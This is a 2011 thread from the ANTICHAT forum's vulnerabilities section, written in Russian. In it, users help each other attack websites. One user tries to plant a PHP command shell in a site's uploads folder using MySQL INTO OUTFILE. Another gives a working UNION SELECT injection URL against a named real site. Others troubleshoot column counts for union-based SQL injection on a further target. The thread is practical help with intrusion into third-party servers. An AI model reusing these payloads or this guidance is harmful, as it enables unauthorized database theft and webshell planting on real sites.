HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18441  
Старый 31.10.2011, 22:28
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от wkar  
wkar said:
В чем ошибка ?
Код:
Code:
select '' from mysql.user into outfile '/var/www/uprgroup/data/www/upr-group.ru/images/uploads2/test.php'
через запрос в скуле? или через пыху заливаешь? файл_прив есть положительное? папка доступна для записи?
 
Ответить с цитированием

  #18442  
Старый 31.10.2011, 22:33
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

В админке есть SQL-менеджер, папка есть, файл прив тоже.
 
Ответить с цитированием

  #18443  
Старый 31.10.2011, 22:39
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Может в том, что пыху не понятно, что такое cmd?

$_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.

from mysql.user - нужно убрать вообще
 
Ответить с цитированием

  #18444  
Старый 31.10.2011, 22:43
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Код:
Code:
Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1

Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
 
Ответить с цитированием

  #18445  
Старый 31.10.2011, 23:43
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1

как такое крутить?
 
Ответить с цитированием

  #18446  
Старый 31.10.2011, 23:54
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от vaddd  
vaddd said:
http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1
как такое крутить?
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20+

вот так вот и надо...как обычную
 
Ответить с цитированием

  #18447  
Старый 01.11.2011, 00:14
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20+
вот так вот и надо...как обычную
ясно...

смутило это:

Цитата:
Сообщение от None  
http://www.pmrs.ps/last/etemplate.php?id=249%20order%20by%20100500
 
Ответить с цитированием

  #18448  
Старый 01.11.2011, 00:35
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756

Репутация: 0
По умолчанию

Цитата:
Сообщение от Melfis  
Melfis said:
Может в том, что пыху не понятно, что такое cmd?
$_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.
Глупости, отработает и так

Цитата:
Сообщение от Melfis  
Melfis said:
from mysql.user - нужно убрать вообще
Не всегда, только если mysql не старый.

wkar у тебя файл не создаётся, варианта три:

1 Нет прав на запись

2 Нет прав на операции с файлами (файлприва тоесть)

3 Путь не верный

--------

upd

Этого не заметил

Цитата:
Сообщение от wkar  
wkar said:
Код:
Code:
Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1

Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
А откуда лимит-то? Менеджер добавляет наверное? Так срежь его )
 
Ответить с цитированием

  #18449  
Старый 01.11.2011, 00:55
namez2
Guest
Сообщений: n/a
Провел на форуме:
10263

Репутация: 0
По умолчанию

Разьясните пожалуста что здесь не так?

Код:
Code:
-ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
все ок 92
далее ставлю
-ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+
ответ

The used SELECT statements have a different number of columns

и ошибка... union+select получается не работает?
 
Ответить с цитированием

  #18450  
Старый 01.11.2011, 08:16
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от namez2  
namez2 said:
Разьясните пожалуста что здесь не так?
Код:
Code:
-ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
все ок 92
далее ставлю
-ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+
ответ
The used SELECT statements have a different number of columns
и ошибка... union+select получается не работает?
ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается?

если сам сайт, то пропробуй +GROUP+BY+95+--+

там полей может быть больше 92
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ